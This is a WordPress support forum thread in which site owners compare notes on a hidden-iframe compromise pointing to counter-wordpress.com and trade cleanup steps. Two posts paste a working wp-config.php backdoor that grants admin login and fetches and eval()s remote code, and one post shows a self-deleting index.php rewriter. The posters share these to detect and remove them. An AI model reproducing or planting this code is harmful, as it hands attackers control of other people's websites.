Posted 1 year ago #
Hi,
have somebody more info about
<iframe id="iframe" style="width: 1px; height: 1px;" src=" http://counter-wordpress.com/frame.php">
<html>
<head>
</head>
<body>
</body>
</html>
</iframe>Somebody hacked all my WP sites...
THX to all who will help.
Posted 1 year ago #
I am hosted on Bluehost.com. I was speaking to a customer service rep today. He said he noticed this appearing in an iframe on a non-Wordpress site. I have this on some of my sites also. I would appreciate any information anyone has.
Thanks
Miles
Posted 1 year ago #
I ha have re upload all wp sites and now is all ok. One one non wp site I notice the same thing but I did the same like and wit wp sites.
Good luck Miles.
Posted 1 year ago #
I just got this exact iframe hack on my wordpress site. I have scoured many many files, run antivirus/malware checks on the whole site without any success. I am hosted with VentraIP.com.au. This seems like a new hack given OP posted 2 hours ago. I noticed this just yesterday.
Posted 1 year ago #
Look in config.php
delete code:
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == ''){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}There is somwhere else, still looking. I don't know how they hack the site...
Regards!
Posted 1 year ago #
I also re-uploaded my WP files, and everything seems to be in order again - for now at least!
Posted 1 year ago #
Interesting, seeing the same iframe code in some of my Joomla sites too.
Posted 1 year ago #
I'm not sure what it does, but I have had sites that have been redirecting to other locations (sometimes sleezy, music playing, etc...).
But I have also been upgrading timthumb so those things could be related to that.
@secretja, What do you mean by reupload? Are you installing a fresh theme, or exporting the content of an old site and creating a new wordpress site? I'm afraid to download the whole database for fear it might have malicious code in it...
Thanks for all your help....
Posted 1 year ago #
Hi,
it is not in theme files... somewhere else it is. I downloaded fresh wp and I have upload/upgrade all wp sites. Now is OK.
Posted 1 year ago #
Got this as well after being affected by PHPRemoteView via timthumb ....
Now PHPRemoteView is gone, timthumb is up to date, but after removing it yesterday (In my case a JS), it came back this morning ...
Mine was embedded in a JS, \wp-includes\js\l10n.js yesterday, and this morning \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js .... The code is obfuscated ....
I already mention it on a PHPRemoteView topic ....
http://wordpress.org/support/topic/two-strange-errors?replies=22#post-2289404
Posted 1 year ago #
Once you've removed TimThumb, you STILL need to perform the usual steps.
1) Change ALL YOUR PASSWORD
2) Scan ALL your files (esp .htaccess) for anything hinky.
Best would be to delete and re-upload everything fresh, and then change every single password, from WP to FTP and SQL.
Posted 1 year ago #
Damn sometime i'm a tool, i just forgot to upload the clean wp-config.php ....
Anyway, still looking to be sure ....
Spirit_of_Martin, my php is a little bit rusty, but, basically, this bit of php, gave the attacker the cookie of the admin, in the first condition, the second look like some kind of scanner/patcher, and the third a file downloader ....
My guess is that there's a tool on top of it (On another server or computer) ....
Posted 1 year ago #
The same thing happened to us today on our site. We've been getting hit with attacks all seemingly coming from the timthumb vulnerability. We have updated timthumb but this keeps happening. I'm guessing there's a missing back door somewhere.
What's really concerning to me is that my site's database password has been commented out and changed. I'm wondering if there's anything wrong with my database now...
Posted 1 year ago #
I got it again. Damn.
Posted 1 year ago #
Then you're not cleaning it up right.
Best way at this point would be to do this:
1) backup EVERYTHING to your PC. Files and DB.
2) DELETE the files on your server. Yeah. Don't worry, your posts are on your database, we're leaving that alone.
3) Change your passwords fro SSH/FTP and SQL
4) On your PC, review the following files:
.htaccess
wp-config.php
They look okay? Good. Copy them back up to your server (remember to edit your wp-config.php with your new SQL password).
5) Get FRESH and CLEAN downloads of WordPress, all your themes and plugins
6) As soon as you get in, change your passwords.
Posted 1 year ago #
This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can't find an iframe or "counter" in the source code. Where is it, so I can know if it's gone?
Posted 1 year ago #
Check at http://sitecheck.sucuri.net/scanner/ It should tell you
Posted 1 year ago #
Thank you so much!
Posted 1 year ago #
Just found this on one of my sites. It looks bad. Anything special I should do? It was in the wp-config file:
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'ea5d2f1c4608232e07d3aa3d998e5135'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
Posted 1 year ago #
Same advice as before.
http://wordpress.org/support/topic/iframe-hack-3?replies=18#post-2290168
You need to rip that code out, ALL of it, change your passwords and clean your site.
Posted 1 year ago #
Ipstenu, you are a HUGE help. Thanks so much!
Posted 1 year ago #
Hi,
I hope that I get ride of that s...
1 step - install fresh wp and template
2 change all passwords
check
wp-config
and after that I have found next:
/wp-content/upd.php
<?php
$file = __FILE__;
$pos = strpos($file,'wp-content');
$dir = substr($file,0,$pos);
$index = file_get_contents($dir.'index.php');
$index = str_replace('superpuperdomain.com','superpuperdomain2.com',$index);
$f = fopen($dir.'index.php',"w");
fputs($f,$index);
fclose($f);
unlink($file);
?>and
/wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php
because of that you need to check wp-content
Delete those files.
For now is all OK.
Good luck guys... ;)
Posted 1 year ago #
Look for old jquery.js in your template - delete old or upgrade, looks that sometimes there is also something with this iframe hack.
Posted 1 year ago #
1 step - install fresh wp and template
Instead, DELETE WP and then upload. It's the only way to scrub out ALL the files. Then you only have to manually check .htaccess and wp-config.php (and if you've uploaded any non-images I suppose....)
Delete it all EXCEPT for:
wp-config.php
.htaccess
/wp-content/uploads
And even then you have to scan those two files AND look for any .php files in /wp-content/uploads/
I wish it was easier :(
Posted 1 year ago #
This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can't find an iframe or "counter" in the source code. Where is it, so I can know if it's gone?
Because it's loaded by a JS file... Clever way to hide this kind of thing ....
My Wp installation is ok now, i didn't delete and reinstall, but i basically did a byte by byte comparison, of the file (with one of my backup, and the file from 3.2.1).
But anyway, in my case, the goal was to analyses what they did ....
The best way to be secure, is obviously to delete and reinstall ....
(Sorry for my English this morning, still no coffee in the system ...)
I wish it was easier :(
Me too, I have been battling this iframe for the past week. I deleted the entire WP install and reinstalled.
First I found the iframe in the theme and after the reinstall, it's in the wp-admin area...not good.
I'm thinking the injection might be in the DB because how else can it contaminate my installation AND not be purged when I deleted all the files?
I'm going to have to do a complete reinstallation with a new DB and see how it goes.
Posted 1 year ago #
@Jorge,
Was your db changed in wp-config.php? Because ours was and I since have changed the password on it and removed the iframe and been monitoring the site to see if it's coming back. I'm really hoping the database hasn't been affected. Let me know what you find.
Posted 1 year ago #
Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?
Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?
Did you change all your passwords?
Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?
Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?
Did you change all your passwords?
Yes, just finished another install with a fresh database.
Went to the wp-admin area, and nothing. I went to the Manage Themes page and bam, it's there.
I'm using Chrome - I right click and click on "Inspect Element" - the iframe is there.
iframe id="iframe" style="width: 1px; height: 1px; " src="http://counter-wordpress.com/frame.php" /iframe
View source shows nothing but that's a given. This is driving me bonkers.
EDIT: If the malicious script was in the DB, it would not have been an issue because like I said, it was a fresh install with a new DB with different passwords, etc.
Posted 1 year ago #
Jorge - Call your webhost ASAFP and tell them this, because it looks like your server's compromised.
This topic has been closed to new replies.
